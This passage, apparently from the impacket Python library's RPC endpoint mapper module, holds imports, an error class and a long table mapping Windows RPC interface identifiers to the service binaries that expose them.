NDRUniVaryingArray, \\\n NDRUniConformantArray\nfrom impacket.dcerpc.v5.dtypes import UUID, LPBYTE, PUUID, ULONG, USHORT\nfrom impacket.structure import Structure\nfrom impacket.dcerpc.v5.ndr import NULL\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket import LOG\n\nMSRPC_UUID_PORTMAP = uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA', '3.0'))\n\nclass DCERPCSessionError(DCERPCException):\n error_messages = {}\n def __init__(self, error_string=None, error_code=None, packet=None):\n DCERPCException.__init__(self, error_string, error_code, packet)\n self.error_code = packet['status']\n\n def __str__( self ):\n key = self.error_code\n if key in self.error_messages:\n error_msg_short = self.error_messages[key]\n return 'EPM SessionError: code: 0x%x - %s ' % (self.error_code, error_msg_short)\n else:\n return 'EPM SessionError: unknown error code: %s' % (str(self.error_code))\n\n################################################################################\n# CONSTANTS\n################################################################################\n\nKNOWN_UUIDS = {\nb\"\\xb0\\x01\\x52\\x97\\xca\\x59\\xd0\\x11\\xa8\\xd5\\x00\\xa0\\xc9\\x0d\\x80\\x51\\x01\\x00\": \"rpcss.dll\",\nb\"\\xf1\\x8f\\x37\\xc9\\xf7\\x16\\xd0\\x11\\xa0\\xb2\\x00\\xaa\\x00\\x61\\x42\\x6a\\x01\\x00\": \"pstorsvc.dll\",\nb\"\\xd4\\xa7\\x72\\x0d\\x48\\x61\\xd1\\x11\\xb4\\xaa\\x00\\xc0\\x4f\\xb6\\x6e\\xa0\\x01\\x00\": \"cryptsvc.dll\",\nb\"\\x40\\x4e\\x9f\\x8d\\x3d\\xa0\\xce\\x11\\x8f\\x69\\x08\\x00\\x3e\\x30\\x05\\x1b\\x01\\x00\": \"services.exe\",\nb\"\\xc5\\x86\\x5a\\xda\\xc2\\x12\\x43\\x49\\xab\\x30\\x7f\\x74\\xa8\\x13\\xd8\\x53\\x01\\x00\": \"regsvc.dll\",\nb\"\\x29\\x07\\x8a\\xfb\\x04\\x2d\\x58\\x46\\xbe\\x93\\x27\\xb4\\xad\\x55\\x3f\\xac\\x01\\x00\": \"lsass.exe\",\nb\"\\x04\\xf7\\xd9\\x52\\xc6\\xd3\\x48\\x47\\xad\\x11\\x25\\x50\\x20\\x9e\\x80\\xaf\\x00\\x00\": \"IMEPADSM.DLL\",\nb\"\\xce\\xad\\x21\\xc4\\xb2\\xa0\\x0d\\x48\\x84\\x18\\x98\\x44\\x95\\xb3\\x2d\\x5f\\x01\\x00\": \"SLsvc.exe\",\nb\"\\x14\\xb5\\xfb\\xd3\\x3b\\x0e\\xcb\\x11\\x8f\\xad\\x08\\x00\\x2b\\x1d\\x29\\xc3\\x01\\x00\": \"locator.exe\",\nb\"\\x6f\\x40\\x1c\\xf6\\x60\\xbd\\x94\\x41\\x95\\x65\\xbf\\xed\\xd5\\x25\\x6f\\x70\\x01\\x00\": \"p2phost.exe\",\nb\"\\x72\\x33\\x3d\\xc1\\x20\\xcc\\x49\\x44\\x9b\\x23\\x8c\\xc8\\x27\\x1b\\x38\\x85\\x01\\x00\": \"rpcrt4.dll\",\nb\"\\x70\\xfe\\x5a\\xd9\\xd5\\xa6\\x59\\x42\\x82\\x2e\\x2c\\x84\\xda\\x1d\\xdb\\x0d\\x01\\x00\": \"wininit.exe\",\nb\"\\x6a\\x07\\x2d\\x55\\x29\\xcb\\x44\\x4e\\x8b\\x6a\\xd1\\x5e\\x59\\xe2\\xc0\\xaf\\x01\\x00\": \"iphlpsvc.dll\",\nb\"\\x95\\x4f\\x25\\xd4\\xc3\\x08\\xcc\\x4f\\xb2\\xa6\\x0b\\x65\\x13\\x77\\xa2\\x9d\\x01\\x00\": \"wwansvc.dll\",\nb\"\\x43\\x9a\\x89\\x11\\x68\\x2b\\x76\\x4a\\x92\\xe3\\xa3\\xd6\\xad\\x8c\\x26\\xce\\x01\\x00\": \"lsm.exe\",\nb\"\\xb4\\x33\\x6f\\x26\\xc1\\xc7\\xd1\\x4b\\x8f\\x52\\xdd\\xb8\\xf2\\x21\\x4e\\xa9\\x01\\x00\": \"wlansvc.dll\",\nb\"\\x68\\x9d\\xcb\\x2a\\x34\\xb4\\x3e\\x4b\\xb9\\x66\\xe0\\x6b\\x4b\\x3a\\x84\\xcb\\x01\\x00\": \"bthserv.dll\",\nb\"\\xd0\\x4c\\x67\\x57\\x00\\x52\\xce\\x11\\xa8\\x97\\x08\\x00\\x2b\\x2e\\x9c\\x6d\\x01\\x00\": \"llssrv.exe\",\nb\"\\x52\\x44\\x7d\\x64\\x33\\x9f\\x18\\x4a\\xb2\\xbe\\xc5\\xc0\\xe9\\x20\\xe9\\x4e\\x01\\x00\": \"pla.dll\",\nb\"\\xc8\\x9b\\x3b\\xde\\xf7\\xbe\\x78\\x45\\xa0\\xde\\xf0\\x89\\x04\\x84\\x42\\xdb\\x01\\x00\": \"audiodg.exe\",\nb\"\\xd1\\x51\\xa9\\xbf\\x0e\\x2f\\xd3\\x11\\xbf\\xd1\\x00\\xc0\\x4f\\xa3\\x49\\x0a\\x01\\x00\": \"aqueue.dll\",\nb\"\\x84\\x55\\x66\\x1e\\xfe\\x40\\x50\\x44\\x8f\\x6e\\x80\\x23\\x62\\x39\\x96\\x94\\x01\\x00\": \"lsm.exe\",\nb\"\\x41\\x76\\x17\\xaa\\x9b\\xfc\\xbd\\x41\\x80\\xff\\xf9\\x64\\xa7\\x01\\x59\\x6f\\x01\\x00\": \"tssdis.exe\",\nb\"\\xe0\\x0c\\x6b\\x90\\x0b\\xc7\\x67\\x10\\xb3\\x17\\x00\\xdd\\x01\\x06\\x62\\xda\\x01\\x00\": \"msdtcprx.dll\",\nb\"\\x51\\xb9\\x6b\\xfd\\x30\\xc8\\x34\\x47\\xbf\\x2c\\x18\\xba\\x6e\\xc7\\xab\\x49\\x01\\x00\": \"iscsiexe.dll\",\nb\"\\x68\\xff\\x1d\\x62\\x39\\x3c\\x6c\\x4c\\xaa\\xe3\\xe6\\x8e\\x2c\\x65\\x03\\xad\\x01\\x00\": \"wzcsvc.dll\",\nb\"\\x56\\xcc\\x35\\x94\\x9c\\x1d\\x24\\x49\\xac\\x7d\\xb6\\x0a\\x2c\\x35\\x20\\xe1\\x01\\x00\": \"sppsvc.exe\",\nb\"\\xf0\\xe4\\x9c\\x36\\xdc\\x0f\\xd3\\x11\\xbd\\xe8\\x00\\xc0\\x4f\\x8e\\xee\\x78\\x01\\x00\": \"profmap.dll\",\nb\"\\x6a\\x28\\x19\\x39\\x0c\\xb1\\xd0\\x11\\x9b\\xa8\\x00\\xc0\\x4f\\xd9\\x2e\\xf5\\x00\\x00\": \"lsasrv.dll\",\nb\"\\x80\\x2b\\xd1\\x76\\x67\\x34\\xd3\\x11\\x91\\xff\\x00\\x90\\x27\\x2f\\x9e\\xa3\\x01\\x00\": \"mqqm.dll\",\nb\"\\x72\\xfe\\x0f\\x8d\\x52\\xd2\\xd0\\x11\\xbf\\x8f\\x00\\xc0\\x4f\\xd9\\x12\\x6b\\x01\\x00\": \"cryptsvc.dll\",\nb\"\\x86\\xd4\\xdc\\x68\\x9e\\x66\\xd1\\x11\\xab\\x0c\\x00\\xc0\\x4f\\xc2\\xdc\\xd2\\x01\\x00\": \"ismserv.exe\",\nb\"\\x83\\xaf\\xe1\\x1f\\x5d\\xc9\\x11\\x91\\xa4\\x08\\x00\\x2b\\x14\\xa0\\xfa\\x03\\x00\\x00\": \"rpcss.dll\",\nb\"\\x06\\x91\\x01\\x24\\x03\\xa2\\x42\\x46\\xb8\\x8d\\x82\\xda\\xe9\\x15\\x89\\x29\\x01\\x00\": \"authui.dll\",\nb\"\\x60\\xa7\\xa4\\x5c\\xb1\\xeb\\xcf\\x11\\x86\\x11\\x00\\xa0\\x24\\x54\\x20\\xed\\x01\\x00\": \"termsrv.dll\",\nb\"\\x4d\\xdd\\x73\\x34\\x88\\x2e\\x06\\x40\\x9c\\xba\\x22\\x57\\x09\\x09\\xdd\\x10\\x05\\x01\": \"winhttp.dll\",\nb\"\\xb2\\xb8\\x7d\\xb9\\x63\\x4c\\xcf\\x11\\xbf\\xf6\\x08\\x00\\x2b\\xe2\\x3f\\x2f\\x02\\x00\": \"clussvc.exe\",\nb\"\\x95\\x1f\\x51\\x33\\x84\\x5b\\xcc\\x4d\\xb6\\xcc\\x3f\\x4b\\x21\\xda\\x53\\xe1\\x01\\x00\": \"ubpm.dll\",\nb\"\\x78\\xb2\\xeb\\x05\\x14\\xe1\\xc1\\x4e\\xa5\\xa3\\x09\\x61\\x53\\xf3\\x00\\xe4\\x01\\x01\": \"tsgqec.dll\",\nb\"\\x24\\xe4\\xfb\\x63\\x29\\x20\\xd1\\x11\\x8d\\xb8\\x00\\xaa\\x00\\x4a\\xbd\\x5e\\x01\\x00\": \"Sens.dll\",\nb\"\\x36\\xa0\\x67\\x07\\x22\\x0d\\xaa\\x48\\xba\\x69\\xb6\\x19\\x48\\x0f\\x38\\xcb\\x01\\x00\": \"pcasvc.dll\",\nb\"\\x20\\x32\\x5f\\x2f\\x26\\xc1\\x76\\x10\\xb5\\x49\\x07\\x4d\\x07\\x86\\x19\\xda\\x01\\x00\": \"netdde.exe\",\nb\"\\x30\\xa0\\xb3\\xfd\\x5f\\x06\\xd1\\x11\\xbb\\x9b\\x00\\xa0\\x24\\xea\\x55\\x25\\x01\\x00\": \"mqqm.dll\",\nb\"\\x80\\x7a\\xdf\\x77\\x98\\xf2\\xd0\\x11\\x83\\x58\\x00\\xa0\\x24\\xc4\\x80\\xa8\\x01\\x00\": \"mqdssrv.dll\",\nb\"\\x03\\x6d\\x71\\x98\\xac\\x89\\xc7\\x44\\xbb\\x8c\\x28\\x58\\x24\\xe5\\x1c\\x4a\\x01\\x00\": \"srvsvc.dll\",\nb\"\\xc8\\xad\\x32\\x4f\\x52\\x60\\x04\\x4a\\x87\\x01\\x29\\x3c\\xcf\\x20\\x96\\xf0\\x01\\x00\": \"sspisrv.dll\",\nb\"\\x90\\x38\\xa9\\x65\\xb9\\xfa\\xa3\\x43\\xb2\\xa5\\x1e\\x33\\x0a\\xc2\\x8f\\x11\\x02\\x00\": \"dnsrslvr.dll\",\nb\"\\x32\\xf5\\x03\\xc5\\x3a\\x44\\x69\\x4c\\x83\\x00\\xcc\\xd1\\xfb\\xdb\\x38\\x39\\x01\\x00\": \"MpSvc.dll\",\nb\"\\x46\\x9f\\x3b\\xc3\\x88\\x20\\xbc\\x4d\\x97\\xe3\\x61\\x25\\xf1\\x27\\x66\\x1c\\x01\\x00\": \"nlasvc.dll\",\nb\"\\xa0\\xb3\\x02\\xa0\\xb7\\xc9\\xd1\\x11\\xae\\x88\\x00\\x80\\xc7\\x5e\\x4e\\xc1\\x01\\x00\": \"wlnotify.dll\",\nb\"\\xd0\\xd1\\x33\\x88\\x5f\\x96\\x16\\x42\\xb3\\xe9\\xfb\\xe5\\x8c\\xad\\x31\\x00\\x01\\x00\": \"SCardSvr.dll\",\nb\"\\x98\\xd0\\xff\\x6b\\x12\\xa1\\x10\\x36\\x98\\x33\\x46\\xc3\\xf8\\x7e\\x34\\x5a\\x01\\x00\": \"wkssvc.dll\",\nb\"\\x38\\x8d\\x04\\x7e\\x08\\xac\\xf1\\x4f\\x8e\\x6b\\xf3\\x5d\\xba\\xb8\\x8d\\x4a\\x01\\x00\": \"mqqm.dll\",\nb\"\\x35\\x42\\x51\\xe3\\x06\\x4b\\xd1\\x11\\xab\\x04\\x00\\xc0\\x4f\\xc2\\xdc\\xd2\\x04\\x00\": \"ntdsai.dll\",\nb\"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\\x00\\x00\": \"sfmsvc.exe\",\nb\"\\xc5\\x28\\x47\\x3c\\xab\\xf0\\x8b\\x44\\xbd\\xa1\\x6c\\xe0\\x1e\\xb0\\xa6\\xd6\\x01\\x00\": \"dhcpcsvc6.dll\",\nb\"\\x36\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x46\\x00\\x00\": \"rpcss.dll\",\nb\"\\x54\\x79\\x26\\x3d\\xb7\\xee\\xd1\\x11\\xb9\\x4e\\x00\\xc0\\x4f\\xa3\\x08\\x0d\\x01\\x00\": \"lserver.dll\",\nb\"\\xbf\\x09\\x11\\x81\\xe1\\xa4\\xd1\\x11\\xab\\x54\\x00\\xa0\\xc9\\x1e\\x9b\\x45\\x01\\x00\": \"WINS.EXE\",\nb\"\\xd0\\xbb\\xf5\\x7a\\x63\\x60\\xd1\\x11\\xae\\x2a\\x00\\x80\\xc7\\x5e\\x4e\\xc1\\x00\\x00\": \"irmon.dll\",\nb\"\\x99\\x1e\\xb8\\x12\\x07\\xf2\\x4c\\x4a\\x85\\xd3\\x77\\xb4\\x2f\\x76\\xfd\\x14\\x01\\x00\": \"seclogon.dll\",\nb\"\\x6c\\x5e\\x64\\x00\\x9f\\xfc\\x0c\\x4a\\x98\\x96\\xf0\\x0b\\x66\\x29\\x77\\x98\\x01\\x00\": \"icardagt.exe\",\nb\"\\x9f\\x2f\\x5b\\xb1\\x3c\\x90\\x71\\x46\\x8d\\xc0\\x77\\x2c\\x54\\x21\\x40\\x68\\x01\\x00\": \"pwmig.dll\",\nb\"\\xa6\\x95\\x7d\\x49\\x27\\x2d\\xf5\\x4b\\x9b\\xbd\\xa6\\x04\\x69\\x57\\x13\\x3c\\x01\\x00\": \"termsrv.dll\",\nb\"\\xcb\\x92\\xbe\\x5c\\xbe\\xf4\\xc9\\x45\\x9f\\xc9\\x33\\xe7\\x3e\\x55\\x7b\\x20\\x01\\x00\": \"lsasrv.dll\",\nb\"\\xa1\\x0f\\x51\\x69\\x99\\x2f\\xeb\\x4e\\xa4\\xff\\xaf\\x25\\x9f\\x0f\\x97\\x49\\x01\\x00\": \"wecsvc.dll\",\nb\"\\x70\\x5d\\xfb\\x8c\\xa4\\x31\\xcf\\x11\\xa7\\xd8\\x00\\x80\\x5f\\x48\\xa1\\x35\\x03\\x00\": \"smtpsvc.dll\",\nb\"\\x46\\x0d\\x85\\x77\\x1d\\x85\\xb6\\x43\\x93\\x98\\x29\\x01\\x61\\xf0\\xca\\xe6\\x01\\x00\": \"SeVA.dll\",\nb\"\\xc3\\x26\\xf2\\x76\\x14\\xec\\x25\\x43\\x8a\\x99\\x6a\\x46\\x34\\x84\\x18\\xaf\\x01\\x00\": \"winlogon.exe\",\nb\"\\x84\\x65\\x0a\\x0b\\x0f\\x9e\\xcf\\x11\\xa3\\xcf\\x00\\x80\\x5f\\x68\\xcb\\x1b\\x01\\x00\": \"rpcss.dll\",\nb\"\\x15\\x55\\xf2\\x11\\x79\\xc8\\x0a\\x40\\x98\\x9e\\xb0\\x74\\xd5\\xf0\\x92\\xfe\\x01\\x00\": \"lsm.exe\",\nb\"\\xc0\\xe0\\x4d\\x89\\x55\\x0d\\xd3\\x11\\xa3\\x22\\x00\\xc0\\x4f\\xa3\\x21\\xa1\\x01\\x00\": \"wininit.exe\",\nb\"\\x00\\xac\\x0a\\xf5\\xf3\\xc7\\x8e\\x42\\xa0\\x22\\xa6\\xb7\\x1b\\xfb\\x9d\\x43\\x01\\x00\": \"cryptsvc.dll\",\nb\"\\xa5\\x44\\xb0\\x30\\x25\\xa2\\xf0\\x43\\xb3\\xa4\\xe0\\x60\\xdf\\x91\\xf9\\xc1\\x01\\x00\": \"certprop.dll\",\nb\"\\x78\\x57\\x34\\x12\\x34\\x12\\xcd\\xab\\xef\\x00\\x01\\x23\\x45\\x67\\x89\\xab\\x00\\x00\": \"lsasrv.dll\",\nb\"\\x49\\x69\\xe9\\x98\\x59\\xbc\\xf1\\x47\\x92\\xd1\\x8c\\x25\\xb4\\x6f\\x85\\xc7\\x01\\x00\": \"wlanext.exe\",\nb\"\\xb8\\x61\\xe5\\xff\\x15\\xbf\\xcf\\x11\\x8c\\x5e\\x08\\x00\\x2b\\xb4\\x96\\x49\\x02\\x00\": \"clussvc.exe\",\nb\"\\xb4\\x59\\xcc\\xf5\\x64\\x42\\x1a\\x10\\x8c\\x59\\x08\\x00\\x2b\\x2f\\x84\\x26\\x01\\x00\": \"ntfrs.exe\",\nb\"\\xb4\\x59\\xcc\\xf5\\x64\\x42\\x1a\\x10\\x8c\\x59\\x08\\x00\\x2b\\x2f\\x84\\x26\\x01\\x01\": \"ntfrs.exe\",\nb\"\\xa4\\xc2\\xab\\x50\\x4d\\x57\\xb3\\x40\\x9d\\x66\\xee\\x4f\\xd5\\xfb\\xa0\\x76\\x05\\x00\": \"dns.exe\",\nb\"\\xb9\\x99\\x3f\\x87\\x4d\\x1b\\x10\\x99\\xb7\\xaa\\x00\\x04\\x00\\x7f\\x07\\x01\\x00\\x00\": \"ssmsrp70.dll\",\nb\"\\x01\\xc3\\x53\\xb2\\xa2\\x78\\x70\\x42\\xa9\\x1f\\x66\\x0d\\xee\\x06\\x9f\\x4c\\x01\\x00\": \"rdpcore.dll\",\nb\"\\x94\\x68\\x71\\x22\\x8e\\xfd\\x62\\x44\\x97\\x83\\x09\\xe6\\xd9\\x53\\x1f\\x16\\x01\\x00\": \"ubpm.dll\",\nb\"\\xf6\\xb8\\x35\\xd3\\x31\\xcb\\xd0\\x11\\xb0\\xf9\\x00\\x60\\x97\\xba\\x4e\\x54\\x01\\x00\": \"polagent.dll\",\nb\"\\x64\\x1d\\x82\\x0c\\xfc\\xa3\\xd1\\x11\\xbb\\x7a\\x00\\x80\\xc7\\x5e\\x4e\\xc1\\x01\\x00\": \"irftp.exe\",\nb\"\\xb8\\x4a\\x9f\\x4d\\x1c\\x7d\\xcf\\x11\\x86\\x1e\\x00\\x20\\xaf\\x6e\\x7c\\x57\\x00\\x00\": \"rpcss.dll\",\nb\"\\xa8\\x95\\xee\\x81\\x2e\\x88\\x15\\x46\\x88\\x8a\\x53\\x34\\x4c\\xa1\\x49\\xe4\\x01\\x00\": \"vpnikeapi.dll\",\nb\"\\xfb\\xee\\x0c\\x13\\x66\\xe4\\xd1\\x11\\xb7\\x8b\\x00\\xc0\\x4f\\xa3\\x28\\x83\\x02\\x00\": \"ismip.dll\",\nb\"\\x72\\xee\\xf3\\xc6\\x7e\\xce\\xd1\\x11\\xb7\\x1e\\x00\\xc0\\x4f\\xc3\\x11\\x1a\\x01\\x00\": \"rpcss.dll\",\nb\"\\x9a\\xf9\\x1e\\x20\\xa0\\x7f\\x4c\\x44\\x93\\x99\\x19\\xba\\x84\\xf1\\x2a\\x1a\\x01\\x00\": \"appinfo.dll\",\nb\"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\\x03\\x00\": \"srvsvc.dll\",\nb\"\\x72\\xe4\\x9f\\x6d\\xf1\\x30\\x08\\x47\\x8f\\xa8\\x67\\x83\\x62\\xb9\\x61\\x55\\x01\\x00\": \"wimserv.exe\",\nb\"\\xd4\\xd7\\x44\\x7c\\xd5\\x31\\x4c\\x42\\xbd\\x5e\\x2b\\x3e\\x1f\\x32\\x3d\\x22\\x01\\x00\": \"ntdsai.dll\",\nb\"\\x55\\x1a\\x20\\x6f\\x4d\\xa2\\x5f\\x49\\xaa\\xc9\\x2f\\x4f\\xce\\x34\\xdf\\x99\\x01\\x00\": \"IPHLPAPI.DLL\",\nb\"\\x32\\x35\\x0f\\x30\\xcc\\x38\\xd0\\x11\\xa3\\xf0\\x00\\x20\\xaf\\x6b\\x0a\\xdd\\x01\\x02\": \"trkwks.dll\",\nb\"\\x32\\x35\\x0f\\x30\\xcc\\x38\\xd0\\x11\\xa3\\xf0\\x00\\x20\\xaf\\x6b\\x0a\\xdd\\x01\\x00\": \"trkwks.dll\",\nb\"\\x60\\xf4\\x82\\x4f\\x21\\x0e\\xcf\\x11\\x90\\x9e\\x00\\x80\\x5f\\x48\\xa1\\x35\\x04\\x00\": \"nntpsvc.dll\",\nb\"\\x7d\\xce\\x54\\x5f\\x79\\x5b\\x75\\x41\\x85\\x84\\xcb\\x65\\x31\\x3a\\x0e\\x98\\x01\\x00\": \"appinfo.dll\",\nb\"\\xdc\\x3f\\x27\\x82\\x2a\\xe3\\xc3\\x18\\x3f\\x78\\x82\\x79\\x29\\xdc\\x23\\xea\\x00\\x00\": \"wevtsvc.dll\",\nb\"\\x3a\\xcf\\xe0\\x16\\x04\\xa6\\xd0\\x11\\x96\\xb1\\x00\\xa0\\xc9\\x1e\\xce\\x30\\x01\\x00\": \"ntdsbsrv.dll\",\nb\"\\x98\\xd0\\xff\\x6b\\x12\\xa1\\x10\\x36\\x98\\x33\\x01\\x28\\x92\\x02\\x01\\x62\\x00\\x00\": \"browser.dll\",\nb\"\\xd6\\x09\\x48\\x48\\x39\\x42\\x1b\\x47\\xb5\\xbc\\x61\\xdf\\x8c\\x23\\xac\\x48\\x01\\x00\": \"lsm.exe\",\nb\"\\xe8\\x04\\xe6\\x58\\xdb\\x9a\\x2e\\x4d\\xa4\\x64\\x3b\\x06\\x83\\xfb\\x14\\x80\\x01\\x00\": \"appinfo.dll\",\nb\"\\x57\\x72\\xd4\\xa2\\xf7\\x12\\xeb\\x4b\\x89\\x81\\x0e\\xbf\\xa9\\x35\\xc4\\x07\\x01\\x00\": \"p2psvc.dll\",\nb\"\\x1e\\xdd\\x5b\\x6b\\x8c\\x52\\x2c\\x42\\xaf\\x8c\\xa4\\x07\\x9b\\xe4\\xfe\\x48\\x01\\x00\": \"FwRemoteSvr.dll\",\nb\"\\x75\\x21\\xc8\\x51\\x4e\\x84\\x50\\x47\\xb0\\xd8\\xec\\x25\\x55\\x55\\xbc\\x06\\x01\\x00\": \"SLsvc.exe\",\nb\"\\x78\\x57\\x34\\x12\\x34\\x12\\xcd\\xab\\xef\\x00\\x01\\x23\\x45\\x67\\x89\\xac\\x01\\x00\": \"samsrv.dll\",\nb\"\\xc0\\x47\\xdf\\xb3\\x5a\\xa9\\xcf\\x11\\xaa\\x26\\x00\\xaa\\x00\\xc1\\x48\\xb9\\x09\\x00\": \"mspadmin.exe - Microsoft ISA Server\",\nb\"\\x00\\xac\\x0a\\xf5\\xf3\\xc7\\x8e\\x42\\xa0\\x22\\xa6\\xb7\\x1b\\xfb\\x9d\\x43\\x01\\x01\": \"cryptsvc.dll\",\nb\"\\x65\\x31\\x0a\\xea\\x34\\x48\\xd2\\x11\\xa6\\xf8\\x00\\xc0\\x4f\\xa3\\x46\\xcc\\x04\\x00\": \"FXSSVC.exe\",\nb\"\\x33\\xa2\\x74\\xd6\\x29\\x58\\xdd\\x49\\x90\\xf0\\x60\\xcf\\x9c\\xeb\\x71\\x29\\x01\\x00\": \"ipnathlp.dll\",\nb\"\\xf7\\xaf\\xbe\\xf6\\x19\\x1e\\xbb\\x4f\\x9f\\x8f\\xb8\\x9e\\x20\\x18\\x33\\x7c\\x01\\x00\": \"wevtsvc.dll\",\nb\"\\x70\\x0d\\xec\\xec\\x03\\xa6\\xd0\\x11\\x96\\xb1\\x00\\xa0\\xc9\\x1e\\xce\\x30\\x02\\x00\": \"ntdsbsrv.dll\",\nb\"\\x7c\\xda\\x83\\x4f\\xe8\\xd2\\x11\\x98\\x07\\x00\\xc0\\x4f\\x8e\\xc8\\x50\\x02\\x00\\x00\": \"sfc.dll\",\nb\"\\x80\\x92\\xea\\x46\\xbf\\x5b\\x5e\\x44\\x83\\x1d\\x41\\xd0\\xf6\\x0f\\x50\\x3a\\x01\\x00\": \"ifssvc.exe\",\nb\"\\x81\\xbb\\x7a\\x36\\x44\\x98\\xf1\\x35\\xad\\x32\\x98\\xf0\\x38\\x00\\x10\\x03\\x02\\x00\": \"services.exe\",\nb\"\\x66\\x9f\\x9b\\x62\\x6c\\x55\\xd1\\x11\\x8d\\xd2\\x00\\xaa\\x00\\x4a\\xbd\\x5e\\x03\\x00\": \"sens.dll\",\nb\"\\x1c\\x02\\x0c\\xa0\\xe2\\x2b\\xd2\\x11\\xb6\\x78\\x00\\x00\\xf8\\x7a\\x8f\\x8e\\x01\\x00\": \"ntfrs.exe\",\nb\"\\x3e\\xca\\x86\\xc3\\x61\\x90\\x72\\x4a\\x82\\x1e\\x49\\x8d\\x83\\xbe\\x18\\x8f\\x01\\x01\": \"audiosrv.dll\",\nb\"\\x6d\\xa5\\x6e\\xe7\\x3f\\x45\\xcf\\x11\\xbf\\xec\\x08\\x00\\x2b\\xe2\\x3f\\x2f\\x02\\x01\": \"resrcmon.exe\",\nb\"\\xe1\\xbf\\x72\\x4a\\x94\\x92\\xda\\x11\\xa7\\x2b\\x08\\x00\\x20\\x0c\\x9a\\x66\\x01\\x00\": \"rdpinit.exe\",\nb\"\\x7c\\x5f\\xc4\\xa2\\x32\\x7d\\xad\\x46\\x96\\xf5\\xad\\xaf\\xb4\\x86\\xbe\\x74\\x01\\x00\": \"services.exe\",\nb\"\\x01\\x6b\\x77\\x45\\x56\\x59\\x85\\x44\\x9f\\x80\\xf4\\x28\\xf7\\xd6\\x01\\x29\\x02\\x00\": \"dnsrslvr.dll\",\nb\"\\x96\\x7b\\x9b\\x6c\\xa8\\x45\\xca\\x4c\\x9e\\xb3\\xe2\\x1c\\xcf\\x8b\\x5a\\x89\\x01\\x00\": \"umpo.dll\",\nb\"\\x15\\x04\\x42\\x9d\\xfb\\xb8\\x4a\\x4f\\x8c\\x53\\x45\\x02\\xea\\xd3\\x0c\\xa9\\x01\\x00\": \"PlaySndSrv.dll\",\nb\"\\x50\\x38\\xcd\\x15\\xca\\x28\\xce\\x11\\xa4\\xe8\\x00\\xaa\\x00\\x61\\x16\\xcb\\x01\\x00\": \"PeerDistSvc.dll\",\nb\"\\x20\\xe5\\x98\\xa3\\x9a\\xd5\\xdd\\x4b\\xaa\\x7a\\x3c\\x1e\\x03\\x03\\xa5\\x11\\x01\\x00\": \"IKEEXT.DLL\",\nb\"\\x08\\x83\\xaf\\xe1\\x1f\\x5d\\xc9\\x11\\x91\\xa4\\x08\\x00\\x2b\\x14\\xa0\\xfa\\x03\\x00\": \"rpcss.dll\",\nb\"\\x00\\x7c\\xda\\x83\\x4f\\xe8\\xd2\\x11\\x98\\x07\\x00\\xc0\\x4f\\x8e\\xc8\\x50\\x02\\x00\": \"sfc_os.dll\",\nb\"\\xf2\\xdc\\x51\\x4a\\x3a\\x5c\\xd2\\x4d\\x84\\xdb\\xc3\\x80\\x2e\\xe7\\xf9\\xb7\\x01\\x00\": \"ntdsai.dll\",\nb\"\\x82\\x06\\xf7\\x1f\\x51\\x0a\\xe8\\x30\\x07\\x6d\\x74\\x0b\\xe8\\xce\\xe9\\x8b\\x01\\x00\": \"taskcomp.dll\",\nb\"\\x00\\xb9\\x99\\x3f\\x87\\x4d\\x1b\\x10\\x99\\xb7\\xaa\\x00\\x04\\x00\\x7f\\x07\\x01\\x00\": \"ssmsrpc.dll - Microsoft SQL Server\",\nb\"\\x20\\x17\\x82\\x5b\\x3b\\xf6\\xd0\\x11\\xaa\\xd2\\x00\\xc0\\x4f\\xc3\\x24\\xdb\\x01\\x00\": \"dhcpssvc.dll\",\nb\"\\x22\\xc4\\xa1\\x4d\\x3d\\x94\\xd1\\x11\\xac\\xae\\x00\\xc0\\x4f\\xc2\\xaa\\x3f\\x01\\x00\": \"trksvr.dll\",\nb\"\\x74\\xe9\\xa5\\x1a\\x82\\x62\\x8d\\x4e\\x9c\\x96\\x40\\x18\\x6e\\x89\\xd2\\x80\\x01\\x00\": \"scss.exe\",\nb\"\\x94\\x73\\x92\\x1a\\x2e\\x35\\x53\\x45\\xae\\x3f\\x7c\\xf4\\xaa\\xfc\\xa6\\x20\\x01\\x00\": \"wdssrv.dll\",\nb\"\\x66\\xf6\\x8c\\x04\\x42\\xab\\xb4\\x42\\x89\\x75\\x13\\x57\\x01\\x8d\\xec\\xb3\\x01\\x00\": \"ws2_32.dll\",\nb\"\\x3a\\xcf\\xe0\\x16\\x04\\xa6\\xd0\\x11\\x96\\xb1\\x00\\xa0\\xc9\\x1e\\xce\\x30\\x02\\x00\": \"ntdsbsrv.dll\",\nb\"\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x69\\x01\\x00\": \"kdcsvc.dll\",\nb\"\\xb0\\x52\\x8e\\x37\\xa9\\xc0\\xcf\\x11\\x82\\x2d\\x00\\xaa\\x00\\x51\\xe4\\x0f\\x01\\x00\": \"taskcomp.dll\",\nb\"\\xe0\\x6d\\x7a\\x8c\\x8d\\x78\\xd0\\x11\\x9e\\xdf\\x44\\x45\\x53\\x54\\x00\\x00\\x02\\x00\": \"wiaservc.dll\",\nb\"\\x05\\x81\\xa7\\x3c\\xa3\\xa3\\x68\\x4a\\xb4\\x58\\x1a\\x60\\x6b\\xab\\x8f\\xd6\\x01\\x00\": \"mpnotify.exe\",\nb\"\\x2e\\xa0\\x8a\\xb5\\x84\\x28\\x97\\x4e\\x81\\x76\\x4e\\xe0\\x6d\\x79\\x41\\x84\\x01\\x00\": \"sysmain.dll\",\nb\"\\x95\\x4f\\x25\\xd4\\xc3\\x08\\xcc\\x4f\\xb2\\xa6\\x0b\\x65\\x13\\x77\\xa2\\x9c\\x01\\x00\": \"wwansvc.dll\",\nb\"\\x6e\\x2c\\xf4\\xc3\\xcc\\xd4\\x5a\\x4e\\x93\\x8b\\x9c\\x5e\\x8a\\x5d\\x8c\\x2e\\x01\\x00\": \"wlanmsm.dll\",\nb\"\\x53\\x0c\\x19\\xf3\\x0c\\x4e\\x1a\\x49\\xaa\\xd3\\x2a\\x7c\\xeb\\x7e\\x25\\xd4\\x01\\x00\": 